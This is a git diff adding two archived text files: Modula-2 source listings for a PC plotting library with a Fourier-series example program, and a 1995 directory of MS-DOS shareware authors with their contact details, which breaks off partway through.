a/textfiles.com/computers/auping.asc b/textfiles.com/computers/auping.asc new file mode 100644 index 00000000..e46d339d --- /dev/null +++ b/textfiles.com/computers/auping.asc @@ -0,0 +1,384 @@ +_MAKING THE MOVE TO MODULA-2_ +by J.V. Auping and Chis Johnston + +[LISTING ONE] + +DEFINITION MODULE ModPlot; + +(* Title : High level Modula-2 Graphics library interface +Author : Judy Auping +System : PC Graphics +Compiler: LOGITECH MODULA-2/86 +*) + + FROM DataDefs IMPORT + DeviceType,UnitsType,SizeType,AngleType,LineType,ColorType, + FontType,OriginType,SymbolType,ModeType,STRING80; + + EXPORT QUALIFIED + GraphInit,SetPlotDevice,SetPlotArea,SetScaledArea,SetScale,SetUnits, + SetCharSize,SetLabelAngle,SetLineType,SetPenColor,SetBackgroundColor, + SetLabelOrigin,SetFixedDigits,ReturnRatio,SetFontType, + Draw,Move,IncDraw,IncMove,DrawXAxis,DrawYAxis,DrawAxes,DrawGrid, + DrawLabel,DrawLabelledAxes,DrawLabelledGrid,DrawFrame,DrawSymbol, + Where,NewScreen,CloseGraphics; + + PROCEDURE GraphInit; + (* Initializes system-MUST be called before any output generated *) + PROCEDURE SetPlotDevice(GraphDevice: DeviceType); + (* Selects output device for subsequent graphics commands *) + PROCEDURE SetPlotArea(XMin,XMax,YMin,YMax: REAL); + (* Sets the 'clip' area in % of absolute device boundaries*) + PROCEDURE SetScaledArea(XMin,XMax,YMin,YMax: REAL); + (* Sets the area in % of absolute device boundaries to which + subsequent SetScale takes effect*) + PROCEDURE SetScale(XMin,XMax,YMin,YMax: REAL); + (* Sets the user scale *) + PROCEDURE SetUnits(GraphUnits: UnitsType); + (* Sets either User (Scaled units) or Device (absolute units) *) + PROCEDURE SetCharSize(CharSize: SizeType); + (* Sets character size for subsequent labels *) + PROCEDURE SetLabelAngle(LabelRotation: AngleType); + (* Sets the angle of rotation of subseqent labels *) + PROCEDURE SetLineType(LineTypeSelected: LineType); + (* Sets the line type for subsequent Draw commands *) + PROCEDURE SetPenColor(PenColor: ColorType); + (* Sets the pen color for subsequent output *) + PROCEDURE SetBackgroundColor(BackgroundColor: ColorType); + (* Sets the background color (screen only) *) + PROCEDURE SetLabelOrigin(LabelOrigin: OriginType); + (* Determines orientation relative to current position with + which subsequent labels will be drawn *) + PROCEDURE SetFixedDigits(XNumDigits,YNumDigits: CARDINAL); + (* Sets number of digits to right of decimal point for + subsequent DrawLabelledAxes or DrawLabelledGrid *) + PROCEDURE ReturnRatio(): REAL; + (* Returns the ratio of the physical dimensions of the + plotting area of the current device *) + PROCEDURE SetFontType(FontTypeSelected: FontType); + (* Sets the font type for subsequent label commands *) + PROCEDURE Draw(XCoord,YCoord: REAL); + (* Draw a line from the active position to the specified coords *) + PROCEDURE Move(XCoord,YCoord: REAL); + (* Move the active position to the specified coordinates *) + PROCEDURE IncDraw(XIncr,YIncr: REAL); + (* Do an incremental draw from the active position *) + PROCEDURE IncMove(XIncr,YIncr: REAL); + (* Do an incremental move to the new active position *) + + (* In the following set of axis drawing and labelling procedures, + the variables XIntercept, YIntercept, XTicSpacing, YTicSpacing + XMin, XMax, YMin, and YMax are all interpreted according to the + most recent SetUnits, SetScaledArea, and Set Scale commands. + MajorCount is an integer that specifies the number of tic intervals + between major tic marks. In DrawLabelledAxes and DrawLabelledGrid, + if MajorCount is positive, tic marks are drawn perpendicular to the + corresponding axis; if negative, tic marks are parallel. + MajorTicFrac specifies the size of the major tics as a percentage + of the length of the corresponding axis.*) + + PROCEDURE DrawXAxis(YIntercept,TicSpacing,XMin,XMax: REAL; + MajorCount: INTEGER; + MajorTicFrac: REAL); + (* Draw an X-axis from XMin to XMax at the specified y-intercept*) + PROCEDURE DrawYAxis(XIntercept,TicSpacing,YMin,YMas: REAL; + MajorCount: INTEGER; + MajorTicFrac: REAL); + (* Draw a Y-axis from YMin to YMax at the specified x-intercept*) + PROCEDURE DrawAxes(XIntercept,YIntercept,XTicSpacing,YTicSpacing: REAL; + XMajorCount,YMajorCount: INTEGER; + XMajorTicFrac,YMajorTicFrac: REAL); + (* Draws full-scale axes intersecting at XIntercept and YIntercept*) + PROCEDURE DrawGrid(XIntercept,YIntercept,XTicSpacing,YTicSpacing: REAL; + XMajorCount,YMajorCount: INTEGER; + XMinorTicFrac,YMinorTicFrac: REAL); + (* Draws a full-scale grid, with lines spaced symmetrically + around XIntercept,YIntercept *) + PROCEDURE DrawLabel(LabelString: ARRAY OF CHAR); + (* Writes LabelString at the current active position according + to the current CharSize, LabelOrigin, and LabelRotation settings*) + PROCEDURE DrawLabelledAxes(XIntercept,YIntercept,XTicSpacing, + YTicSpacing: REAL; + XMajorCount,YMajorCount: INTEGER; + XMajorTicFrac,YMajorTicFrac: REAL); + (* Draws a pair of axes in the same manner as DrawAxes. Puts + labels at the major tic marks according to the current + CharSize, XNumDigits, and YNumDigits settings *) + PROCEDURE DrawLabelledGrid(XIntercept,YIntercept,XTicSpacing, + YTicSpacing: REAL; + XGridSpacing,YGridSpacing: INTEGER; + XMajorTicFrac,YMajorTicFrac: REAL); + (* Draws a full-scale grid as in DrawGrid and labels the grid + lines as in DrawLabelledAxes *) + PROCEDURE DrawFrame; + (* Draws a box around the current plotting area *) + PROCEDURE DrawSymbol(XCoord,YCoord: REAL; + Symbol: SymbolType; + Size: REAL); + (* Draws the indicated symbol centered at XCoord,YCoord. + Size is specified in mm *) + PROCEDURE Where(VAR XCoord,YCoord: REAL); + (* Returns the coordinate values of the current active position*) + PROCEDURE NewScreen(Mode: ModeType); + (* Clears the screen and sets the mode. No cursor in Menu mode*) + PROCEDURE CloseGraphics; + (* Cleans up the interrupts and restores to normal *) +END ModPlot. + + +[LISTING TWO] + +DEFINITION MODULE GDriver; +(* Title : Low Level CRT and Plotter Draw module +Author : Chris Johnston +System : Modula-2 Plotting System +Compiler: LOGITECH MODULA-2/86 +*) + + FROM DataDefs IMPORT ModeType, STRING80, DevPresentType; + + EXPORT QUALIFIED + ReadDevices, DrawAbs, MoveAbs, DrawString, SetMode, CleanUp; + + PROCEDURE ReadDevices(VAR DevicesPresent : DevPresentType); + (* Finds out what devices are available: EGA/CGA and + IBM7372A/IBM7372B/IBM7371. An HP 7470 is reported + as an IBM7371 and the HP 7475 is reported as an + IBM7372A or B depending upon the paper size selected *) + + PROCEDURE DrawAbs(XCoord, YCoord : CARDINAL); + (* Draw a line from the current location to XCoord, YCoord + on the selected device. Line type and color read from system + globals *) + + PROCEDURE MoveAbs(XCoord, YCoord : CARDINAL); + (* Move from the current location to XCoord, YCoord on the + selected device with the pen raised. *) + + PROCEDURE DrawString(XCoord, YCoord : CARDINAL; + LabelString : ARRAY OF CHAR); + (* Draw the character string LabelString starting at XCoord, YCoord. + The font, color, size, and rotation are selected from system globals +*) + + PROCEDURE SetMode( Mode : ModeType); + (* Set the mode to text or graphics and clear the screen. This call has + ** NO EFFECT ** if the selected device is a plotter *) + + PROCEDURE CleanUp; + (* clean up the interrupt drivers and the character set at the end. *) + +END GDriver. + + + +[LISTING THREE] + +DEFINITION MODULE DataDefs; + +(* Title : Data Definitions +Author : Judy Auping +System : PC Graphics +Compiler: LOGITECH MODULA-2/86 +*) + + EXPORT QUALIFIED + DeviceType,UnitsType,SizeType,AngleType,LineType,ColorType, + FontType,OriginType,SymbolType,DevPresentType,ModeType,STRING80, + GraphDevice,LineTypeSelected,CharSize,FontTypeSelected, + PenColor,BackgroundColor,LabelRotation,DeviceXMax,DeviceYMax, + ErrorString, DriverError; + + TYPE + DeviceType = (EGA,CGA,IBM7372A,IBM7372B,IBM7371); + UnitsType = (User,Device); + SizeType = (Small,Med,Large,XLarge); + AngleType = (Deg0,Deg45,Deg90,Deg135,Deg180,Deg225,Deg270,Deg315); + LineType = (Solid, EndPoint, Dotted, ShortDash, LongDash); + ColorType = (Black,Blue,Green,Cyan,Red,Magenta,Brown,White, + DarkGray,LightBlue,LightGreen,LightCyan, + LightRed,LightMagenta,Yellow,IntensifiedWhite); + FontType = (Standard,Italic); + OriginType = (UpperRight,CenterRight,LowerRight,UpperMiddle, + CenterMiddle,LowerMiddle,UpperLeft,CenterLeft, + LowerLeft); + SymbolType = (Circle,Square,Triangle,Asterisk,Cross,Plus); + DevPresentType = ARRAY DeviceType OF BOOLEAN; + ModeType = (Graphics,Text,Menu); + STRING80 = ARRAY[0..79] OF CHAR; + + VAR + GraphDevice: DeviceType; + LineTypeSelected: LineType; + CharSize: SizeType; + FontTypeSelected: FontType; + PenColor: ColorType; + BackgroundColor: ColorType; + LabelRotation: AngleType; + DeviceXMax,DeviceYMax: CARDINAL; + DriverError: BOOLEAN; + ErrorString: STRING80; + +END DataDefs. + + + +[LISTING FOUR] + +MODULE Example; +(* Title: Example of using the ModPlot graphics library +Author: Judy Auping +System: PC Graphics +*) + + FROM DataDefs IMPORT + DeviceType,SizeType,ColorType,OriginType; + + FROM ModPlot IMPORT + GraphInit,SetPlotArea,SetScaledArea,SetScale,DrawAxes,SetPenColor, + Move,Draw,DrawFrame,NewScreen,CloseGraphics,SetLabelOrigin,DrawLabel, + SetCharSize,IncDraw,SetPlotDevice; + + FROM MathLib0 IMPORT sin; + + FROM InOut IMPORT Read,WriteString,WriteLn; + +TYPE + CornerType = (UpLeft,UpRight,LowLeft,LowRight); + +CONST + NPnts = 1000; pi = 3.14159; + +VAR + XValue: ARRAY[1..NPnts] OF REAL; + YValue: ARRAY [UpLeft..LowRight] OF ARRAY[1..NPnts] OF REAL; + NumTerms: ARRAY[UpLeft..LowRight] OF CARDINAL; + IPlot: CornerType; + IPnt,ITerm: CARDINAL; + x,NextTerm: REAL; + Input: CHAR; + +PROCEDURE GeneratePlotArrays; +(* This procedure generates arrays of data points for the Fourier series + approximation of a sawtooth wave, where + + y = 2 (sin x - sin(2x)/2 + sin(3x)/3 - sin(4x)/4 + ... ) + + The XValue array contains the x values for the plot in units of pi, where + the values vary from zero to 4pi. + + The YValue array of arrays contains four arrays of y values for + different numbers of terms in the summation approximation. *) + +BEGIN + WriteString("Generating approximation functions"); (* Inform user *) + NumTerms[UpLeft] := 5; NumTerms[UpRight] := 10; + NumTerms[LowLeft] := 20; NumTerms[LowRight] := 100; + + FOR IPnt := 1 TO NPnts DO + + IF (IPnt MOD 100)=0 THEN + WriteString(" ."); (* Let the user know the progress of *) + END (* if *); (* the calculations.*) + + FOR IPlot := UpLeft TO LowRight DO + YValue[IPlot,IPnt] := 0.0; (* Initialize the terms. *) + END (* for *); + + x := FLOAT(IPnt) * (4.0 * pi)/FLOAT(NPnts); + XValue[IPnt] := x/pi; + + FOR ITerm := 1 TO NumTerms[LowRight] DO + IF (ITerm MOD 2)=0 THEN (* even terms are negative *) + NextTerm := -2.0 * sin(FLOAT(ITerm)* x)/FLOAT(ITerm); + ELSE (* odd terms are positive,*) + NextTerm := 2.0 * sin(FLOAT(ITerm)* x)/FLOAT(ITerm); + END (* if *); + + FOR IPlot := UpLeft TO LowRight DO + IF ITerm<=NumTerms[IPlot] THEN + YValue[IPlot,IPnt] := YValue[IPlot,IPnt] + NextTerm; + END (* if *); + END (* for *); + END (* for *); + END (* for *); +END GeneratePlotArrays; + +BEGIN + GeneratePlotArrays; + GraphInit; + SetPlotDevice(IBM7372A); + WriteLn; WriteString("Drawing plot . . ."); (*Let user know where we are*) + + FOR IPlot := UpLeft TO LowRight DO (*Draw a plot for each array*) + CASE IPlot OF (* For each array, choose the appropriate plotting area*) + UpLeft:SetPlotArea(0.0,45.0,60.0,100.0); (*Upper left corner *) + SetScaledArea(5.0,40.0,62.0,94.0); + |UpRight: SetPlotArea(55.0,100.0,60.0,100.0); (*Upper right corner*) + SetScaledArea(60.0,95.0,62.0,94.0); + |LowLeft:SetPlotArea(0.0,45.0,0.0,40.0); (*Lower left*) + SetScaledArea(5.0,40.0,2.0,34.0); + |LowRight:SetPlotArea(55.0,100.0,0.0,40.0); (*Lower right*) + SetScaledArea(60.0,95.0,2.0,34.0); + END (* case *); + + SetScale(0.0,4.0,-4.0,4.0); (* remember, x is in units of pi *) + SetPenColor(Black); + DrawAxes(0.0,0.0,1.0,1.0,2,2,3.0,2.0); (* draw axes without labels *) + (* Labels are drawn separately so we can put 'pi' on x-axis labels*) + SetCharSize(Small); (* Label the axes *) + SetLabelOrigin(CenterLeft); (* First, the y-axis *) + Move(-0.05,4.0); DrawLabel("4"); + Move(-0.05,2.0); DrawLabel("2"); + Move(-0.05,0.0); DrawLabel("0"); + Move(-0.05,-2.0); DrawLabel("-2"); + Move(-0.05,-4.0); DrawLabel("-4"); + + SetLabelOrigin(LowerMiddle); (* Then the x-axis *) + Move(2.0,-0.5); DrawLabel("2pi"); + Move(4.0,-0.5); DrawLabel("4pi"); + + CASE IPlot OF (*Set a new pen color for each plot *) + UpLeft: SetPenColor(Red); + |UpRight: SetPenColor(Green); + |LowLeft: SetPenColor(Blue); + |LowRight: SetPenColor(Magenta); + END (* case *); + + Move(0.0,0.0); (* Start at the origin *) + FOR IPnt := 1 TO NPnts DO + Draw(XValue[IPnt],YValue[IPlot,IPnt]); (*Draw to each point*) + END (* for *); + + SetPenColor(Black); + DrawFrame; (*Draw a box around the plot for this array *) + + Move(0.75,4.7); + SetLabelOrigin(CenterRight); + SetCharSize(Small); + CASE IPlot OF (*Put the appropriate title on each plot*) + UpLeft: DrawLabel("5 terms in series"); + |UpRight: DrawLabel("10 terms in series"); + |LowLeft:DrawLabel("20 terms in series"); + |LowRight:DrawLabel("100 terms in series"); + END (* case *); + END (* for *); + + (*Now that all four plots have been drawn, put a title and + the formula in the middle area on the page *) + SetPlotArea(0.0,100.0,0.0,100.0); (* Set to full screen *); + SetScaledArea(0.0,100.0,0.0,100.0); + SetScale(0.0,100.0,0.0,100.0); + + Move(9.0,53.0); + SetCharSize(Med); + SetLabelOrigin(CenterRight); + DrawLabel("FOURIER SERIES APPROXIMATION TO A SAWTOOTH WAVE"); + Move(17.0,47.0); + SetCharSize(Small); + DrawLabel("y = 2 {sin(x) - sin(2x)/2 + sin(3x)/3 - sin(4x)/4 + ... }"); + + CloseGraphics; (* Clean up and restore the system *) +END Example. + + \ No newline at end of file diff --git a/textfiles.com/computers/author.lst b/textfiles.com/computers/author.lst new file mode 100644 index 00000000..73acdadc --- /dev/null +++ b/textfiles.com/computers/author.lst @@ -0,0 +1,3635 @@ + Copyright (c) by 1993-1995 Timo Salmi + All rights reserved + +ftp://garbo.uwasa.fi/pc/pd2/author35.zip Sun 17-Dec-95 + +* Email addresses of 255 Reachable MS-DOS shareware and PD authors * +==================================================================== + +MS-DOS PD and shareware utility authors please see SUBMIT.TXT for +more information and a convenient fill-in sheet. But please also +read the MUSTREAD.NOW file. This list covers MS-DOS utility PD and +shareware authors reachable by email on InterNet, including authors +with addresses on CompuServe and FidoNet. + +Solely Windows, games or fully commercial authors are not covered by +this list. Windows authors have a list of their own maintained by +Chris Marriott (chris@chrism.demon.co.uk). + +This same ftp://garbo.uwasa.fi/pc/pd2/author*.zip list is also +available without the version number as /pc/link/author.zip. + +A piece of advice. This information has been gathered during a long +period of time. Before trying to contact an author by email try +fingering his/her address to make sure that it is still valid. +Unfortunately, this will not work for all systems, but it is worth +the try. + +.................................................................... +Prof. Timo Salmi Co-moderator of news:comp.archives.msdos.announce +Moderating at ftp:// & http://garbo.uwasa.fi archives 193.166.120.5 +Department of Accounting and Business Finance ; University of Vaasa +ts@uwasa.fi http://uwasa.fi/~ts BBS 961-3170972; FIN-65101, Finland + +------------------------------------------------------------------- +1 Ahlgren, Joe +2 Aitchison, Mark +3 Aitkens, Charles +4 Aldridge, Rafe +5 Andel, Arjen van +6 Anderson, Thomas N. +7 Augustine, Davis +8 Babb, Brendan +9 Babcock, Robert +10 Baer, Dennis +11 Baker, Robert W. +12 Baldwin, L. David +13 Barnes, Michael +14 Baron, Victor +15 Barry, Rey +16 Beauchaine, Robert +17 Berry, Bob +18 Bhalla, Arun +19 Bixler, Roy +20 Blackman, Adrian +21 Blum, Christian +22 Bodoh, Daniel +23 Boer (de Boer), Berend +24 Bohanec, Marko +25 Bondono, Jeff +26 Brandstrom, Peter +27 Branson, Don +28 Breuer, Richard +29 Bridges, John +30 Brown, David +31 Brown, Keith S. +32 Brown, Ralf +33 Bruce, Robert +34 Brucker, Fred P. +35 Brzezinski, Andrzej +36 Buerg, Vernon +37 Burfitt, Kevin +38 Burke, Christopher +39 Button, Jim +40 Caine, Tony +41 Camp, David +42 Carapetis, Paul +43 Carlyle, Jeffrey +44 Carter, Simon +45 Centanni, Nicholas +46 Chin, John +47 Chinook Software +48 Clarke, Daryl +49 Coast to Coast +50 Collins, Adrian +51 Colucci, Michael +52 Conrad, David +53 Corbier, Daniel +54 Coyote Data +55 Datawatch +56 Davies, Robert +57 Davis, Gayle +58 Dell, Thomas +59 Derbyshire, Andrew +60 Derr, James +61 Dhesi, Rahul +62 Dickson, Mike +63 Dight, David +64 DiVecchio, Mark +65 Dobb's, Journal +66 Duby, Philippe +67 Doupnik, Joe +68 Duentsch, Ivo +69 Dumdei, Mike +70 Durward, Jon +71 Edwards, Larry +72 Efros, Alexei +73 Elber, Gershon +74 Engelmann, Eric +75 Eradus, Richard +76 Evsikov, Igor +77 Farfan, Daniel +78 Faulks, Neil +79 Feldmann, Harald +80 Forsberg, Chuck +81 Foy, Jeffery +82 Franchi, Maurizio +83 Frandsen, Jesper +84 Freiss, Martin +85 Fubar Systems +86 Gadegast, Frank +87 Gallias, Michael +88 Garcia, Ciriaco +89 Geeslin, Robert +90 Geiser, Wayne +91 Gillett, Dave +92 Green, J Paul +93 Greenberg, Ross +94 Gregory, Randy +95 Gresseth, Reidar +96 Guthrie, Bruce +97 Gutmann, Peter +98 Hahn, Karl +99 Hakim, Andy +100 Hamel, David +101 Hargreaves, Shawn +102 Harris, Mark +103 Hart, Michael +104 Hass, Jim +105 Heino, Kim +106 Hilbig, Erhard +107 Hogstrom, Jonas +108 Holin, Michael +109 Homrighausen, Joaquim +110 Hovila, Ari +111 Hu, Franklin +112 Hu, Tsung +113 Huang, Weiguang +114 Huseby, Sverre H. +115 Iakovlev, Alex +116 Info-ZIP +117 Isaacson, Eric +118 Jackson, Lee +119 Jaeger, Thomas +120 Jennings, Peter +121 Jeong, Joohee +122 Johansson, Anssi +123 Johnson, Thomas C. +124 JP Software Inc. +125 Jung, Robert +126 Kiernan, John +127 Kim, Eugene +128 Kirsch, Dave +129 Kirschbaum, David P +130 Knudson, Chad +131 Koornneef, Jim +132 Kovach, Warren L. +133 Koziol, Quincey +134 Krehbiel, Courtney +135 Lazarus, Ross +136 Ledbetter, Keith +137 Lee, Gene +138 Lee, Patrick +139 Lewis, Dan +140 Lockrey, Brian +141 Loewy, Ron +142 Mace, Donald +143 Maconochie, David +144 Maddox, Gary +145 Madison, W.G. +146 Madsen, Steven +147 Mahlknecht, Greg +148 Mai, Anthony +149 Marks, Richard +150 Marson, Hamish +151 McAfee Associates +152 McCaffrey, John +153 Menninger, William +154 Miettunen, Jouni +155 Mukherjee, Joy +156 Murdoch, Duncan +157 Nelson, Russell +158 Newlin, John +159 Nguyen, Hoa +160 Ni, Hongbo +161 Noorda, Brent +162 Nugent, Gary +163 Olowofoyeku, Abimbola +164 Ozeran, James +165 Pardun, Gary +166 Patri-Soft +167 Paulson, Duane +168 PCMAG +169 Perkovic, David +170 Pfeiffer, Peter +171 PKWare Inc. +172 Pluimers, Jeroen +173 Podnos, Vladimir +174 Pollet, Patrick +175 Presno (de Presno), Odd +176 Pritchett, Ron +177 Pultz, Scott +178 QuickWare +179 Reeve, Alan +180 Reilley, Peter +181 Revie, Dennis +182 Risku, Kai +183 Rollason, Jeff +184 Rosenthal, Doren +185 Roshal, Eugene +186 Rossmann, Andrew +187 Rothenburg, Robert Walking-Owl +188 Roub, Paul +189 Rovers, Perry +190 Rowe, Eddie +191 Salmi, Timo +192 Salvisberg, Hans +193 Sankey, Todd +194 Schaefer, Arno +195 Schikore, Daniel +196 Schipper, Jeroen +197 Schmidt, Robert +198 Schroeder, W.F. +199 Schull, Jonathan +200 Schulz, Russell +201 Scott, Peter +202 SemWare Inc. +203 Shearer, Dan +204 Shippony, Zvi +205 Shmakov, Sergey +206 Siebeck, Wolfgang +207 Sill, Daniel +208 Silva, John +209 Singh, Manjit +210 Skinner, Roland +211 Skulason, Fridrik +212 Smetana, Rob +213 Smith, David +214 Smith, Harry +215 Smith, Samuel +216 Spielbusch, Stan +217 Starr, David +218 Stern, Marc +219 Stewartson, Ian +220 Stiller, Wolfgang +221 Stone, Chris +222 Strevel, Christian +223 Stroem, Henrik +224 Summers, Peter +225 Szentesi, Zoltan +226 Tassle (Van Tassle), Ray +227 Taylor, Patrick I. +228 Thomson, Douglas +229 Toikkanen, Tarmo +230 Tolliver, James +231 Tong, Ka +232 Torgersen, Knut +233 Tschirner, Tim +234 Uberto, Franck +235 Vandenberg, Rick +236 Veerman, Rene +237 Veldman, Frans +238 Vias, John +239 Vries (de Vries), Nico +240 Vuorenmaa, Markku +241 Vygonets, Vadim +242 Vyncke, Eric +243 Walsh, Norm +244 Walter, Alexander +245 Weatherley, Rhys +246 Weinbeck, Gene +247 Weinstein, Iram +248 Whitmore, Stuart +249 Windl, Ulrich +250 Wisan, Richard +251 Woods, Jeff +252 Woods, Rob +253 Wriedt, Dirk +254 Wunderlich, Jeff +255 Zitterkopf, John D. +------------------------------------------------------------------- + + +Key: Ahlgren, Joe +Author: Joe Ahlgren +Program: GEOCLOCK sunlight clock and map +Company: GeoClock +Email: jahlgren@capaccess.org, 70461.2340@compuserve.com +WWW: +Address: 2218 N Tuckahoe St, Arlington VA 22205 USA +Voice: 703-241-2661 +BBS: 703-241-7980/7981 +Fax: 703-241-5809 +Other Info: + + +Key: Aitchison, Mark +Author: Mark Aitchison +Program: BOOTID freeware Boot Sector (Virus) Identifier +Company: Department of Physics & Astronomy, University of Canterbury +Email: M.Aitchison@csc.canterbury.ac.nz +WWW: +Address: Private Bag 4800, Christchurch, New Zealand +Voice: (0643) 3642-947 +BBS: +Fax: (0643) 3642-999 +Other info: + + +Key: Aitkens, Charles +Author: Charles Aitkens +Program: SCROLLit Scrollback Buffer Utility +Company: Bromfield Software Products +Email: 71054.3051@compuserve.com +WWW: +Address: P.O. Box 70081, Ottawa, Ontario K2P 2M3, CANADA +Voice: +BBS: +Fax: +Other info: + + +Key: Aldridge, Rafe +Author: Rafe Aldridge +Program: RTPC10 - a collection of Turbo Pascal Units and Examples +Company: +Email: rca@ib.rl.ac.uk +WWW: +Address: Street Farm, Dereham Road, Garvestone. NR9 4QT UK +Voice: +BBS: +Fax: +Other info: + + +Key: Andel, Arjen van +Author: Arjen van Andel +Program: File_Handle File & Program manager with Filefinder +Company: Hasoft +Email: 100710.1352@compuserve.com +WWW: +Address: Meeuwensedijk 10, 4268 GV MEEUWEN, The Netherlands +Voice: +31-(0)416-351-469 +BBS: +Fax: +31-(0)416-351-469 +Other info: + + +Key: Anderson, Thomas N. +Author: Thomas N. Anderson +Program: TASM - A table driven cross assembler for MS-DOS +Company: Speech Technology Incorporated +Email: 73770.3612@compuserve.com, toma@sqi.com +WWW: +Address: 837 Front Street South, Issaquah, WA 98027, USA +Voice: (206) 392-8150 +BBS: +Fax: +Other info: Many microprocessor families are supported. + + +Key: Augustine, Davis +Author: Davis Augustine +Program: SHROM Shell Room Utility +Company: +Email: 72230.3053@compuserve.com +WWW: +Address: P.O.Box 390178 Cambridge, MA 02139, USA +Voice: +BBS: +Fax: +Other info: + + +Key: Babb, Brendan +Author: Brendan Babb +Program: BFMT137 - formats text (left/right/justify/centre/align) +Company: +Email: Brendan@micro.uct.ac.za +WWW: +Address: Microbiol. Dept, UCT, Rondebosch 7700, Cape Town, SA +Voice: (021) 650-3258 +BBS: +Fax: +Other info: + + +Key: Babcock, Robert +Author: Robert W. Babcock +Program: Wssindex, disk cataloger, archive & graphics files +Company: WSS Division of DDC +Email: peprbv@cfa0.harvard.edu, babcock@cfa, rbabcock on BIX +WWW: +Address: 4 Reeves Road, Bedford, MA 01730, USA +Voice: 617-275-1183 or 9104 +BBS: 617-275-5834, 14.4kbaud v.32bis, 24 hour, TAGBBS +Fax: +Other info: Association of Shareware professionals member + + +Key: Baer, Dennis +Author: Dennis Baer +Program: Super BASIC Programming Language (IBM, AMIGA, MACINTOSH) +Company: +Email: dennis.baer@hofbbs.com +WWW: +Address: 25 Miller Road, Farmingdale, NY 11735, USA +Voice: (516) 694-5872 +BBS: +Fax: Fax available on request. +Other info: + + +Key: Baker, Robert W. +Author: Robert W. Baker +Program: NEWSyymm & WNWSyymm PC/Mac News Archives +Company: Baker Enterprises +Email: rbakerpc@delphi.com +WWW: +Address: 20 Ferro Dr, Sewell, NJ 08080 U.S.A. +Voice: 609/582-9203 +BBS: +Fax: 609/582-9204 +Other info: PC/Mac Industry news & information services & ref dbases + + +Key: Baldwin, L. David +Author: L. David Baldwin +Program: Dialog Design for Borland's Turbo Vision +Company: +Email: 76327.53@compuserve.com +WWW: +Address: 22 Fox Den Rd., Hollis, NH 03049, USA +Voice: (603) 465-7857 +BBS: +Fax: +Other info: Winter telephone (813) 867-3030 + + +Key: Barnes, Michael +Author: Michael Barnes +Program: Address Master +Company: Artwork Software +Email: ssumbarn@rdg.ac.uk +WWW: +Address: 67 Heath Road, Beaconsfield, Bucks, HP9 1DG, England +Voice: 0494 672806 +BBS: +Fax: +Other info: Also on FidoNet 2:254/151.10 + + +Key: Baron, Victor +Author: Victor G. Baron +Program: Little Black Book Autodialer and Database-Multinational +Company: GTX Software +Email: 71210.3632@compuserve.com +WWW: +Address: 5419 Dahlia Drive, Los Angeles CA 90041, USA +Voice: (213) 257-2704 +BBS: +Fax: +Other info: + + +Key: Barry, Rey +Author: Rey Barry +Program: Freeware Hall of Fame Guide +Company: Freeware Hall of Fame, an archive and BBS +Email rbarry@hopper.acs.virginia.edu +Address: 1561 Dairy Rd., Charlottesville, VA 22903, USA +Voice: 804-293-2693 +BBS: 894-293-4710 +Fax: +Other info: Program is known as HOFmmyy.ZIP + + +Key: Beauchaine, Robert +Author: Robert (Bob) Beauchaine +Program: TVINP102.ZIP, Numerical Input routines for Turbo Vision +Company: Tektronix, Inc. +Email: bobb@vice.ICO.TEK.COM +WWW: +Address: P.O. Box 500, M.S. 59-323, Beaverton, OR 97077, USA +Voice: (503) 627-6086 +BBS: +Fax: (503) 627-5560 +Other info: + + +Key: Berry, Bob +Author: Bob Berry +Program: CSHOW CompuShow program for viewing graphics +Company: Canyon State Systems and Software +Email: 76555.167@compuserve.com +WWW: +Address: Post Office Box 86, Sedona, AZ. 86336, USA +Voice: (602) 282-5070 +BBS: +Fax: +Other info: + + +Key: Bhalla, Arun +Author: Arun Bhalla +Program: AUTORND (Random batch file execution), WCTDDOOR +Company: Arun Bhalla Software (a.k.a. ARUNSOFT) +Email: abhalla@imsa.edu, abhalla@aol.com +WWW: +Address: 6744 Breckenridge Road, Lisle, IL 60532-3409, USA +Voice: (708) 961-5678 (708) 907-5605 +BBS: (708) 961-5678 (call voice first) +Fax: (708) 961-5678 (call voice first) +Other info: + + +Key: Bixler, Roy +Author: Roy Bixler +Program: directory-oriented copy and find duplicate files utils. +Company: +Email: as327@cleveland.freenet.edu +WWW: +Address: 19 Acorn Dr., Hawthorn Woods, IL 60047, USA +Voice: (708) 438-9361 +BBS: +Fax: +Other info: There are also Atari ST versions of above utils. + + +Key: Blackman, Adrian +Author: Adrian J. Blackman +Program: Torganal simulation of qualitative organic analysis +Company: +Email: Adrian.Blackman@chem.utas.edu.au +WWW: +Address: Chem Dept, Uni of Tasmania, Hobart, Tas., Australia +Voice: 61 02202183 +BBS: +Fax: 61 02234074 +Other info: + + +Key: Blum, Christian +Author: Christian Blum +Program: READ, An advanced MS-DOS text file browser +Company: +Email: chbl@stud.uni-sb.de chris@phil15.uni-sb.de +WWW: +Address: Friedrich-Ebert-Str. 50, 66578 Heiligenwald, Germany +Voice: +49 +6821 67476 +BBS: +Fax: same as voice, please contact me first +Other info: + + +Key: Bodoh, Daniel +Author: Daniel Bodoh +Program: DV System Information - Unix-ish utilities for DESQview +Company: University of Wisconsin, ECE grad student +Email: bodoh@xraylith.wisc.edu +WWW: +Address: 1402 Regent #417, Madison WI USA 53711-2244 +Voice: (608) 255-3574 +BBS: +Fax: +Other info: Edits DESQview FAQ list, avail. on SIMTEL as DVFAQx.ZIP + + +Key: Boer (de Boer), Berend +Author: Berend de Boer +Program: PtGen, TurboVision screen generator +Company: Nederware +Email: berend@beard.nest.nl, CIS 100120,3121, FidoNet 2:281/527.23 +WWW: +Address: Burgerstraat 22, 5311 CX Gameren, Netherlands +Voice: 31-4186-1992 +BBS: +Fax: +Other info: + + +Key: Bohanec, Marko +Author: Marko Bohanec +Program: GarboIDX V2.0+ Create SimTel-compatible GARBO.IDX +Company: Institut Jozef Stefan +Email: marko.bohanec@ijs.si +WWW: +Address: Jamova 39, SI-61000 Ljubljana, Slovenia +Voice: +386 61 1259-199 +BBS: +Fax: +386 61 219-385, +386 61 1258-058 +Other info: + + +Key: Bondono, Jeff +Author: Jeffrey (Jeff) Bondono +Program: Our Cosmohood (a 3d view of the nearest 2300 galaxies) +Company: Bondono Software +Email: ah314@detroit.freenet.org +WWW: +Address: 51054 Kingwood / Shelby Twp, MI 48316-4524 / USA +Voice: (810) 731-4706 +BBS: +Fax: (810) 731-3143 +Other info: + + +Key: Brandstrom, Peter +Author: Peter Brandstrom +Program: TVToys, Turbo Vision help and video goodies, BP source +Company: +Email: d91-pbr@nada.kth.se +WWW: +Address: Roslagsg 10, S-113 55 Stockholm, Sweden Europe +Voice: +46 8 612 42 23 +BBS: +Fax: +Other info: + + +Key: Branson, Don +Author: Don Branson +Program: EVENTMAN Set up and run programs un-attended 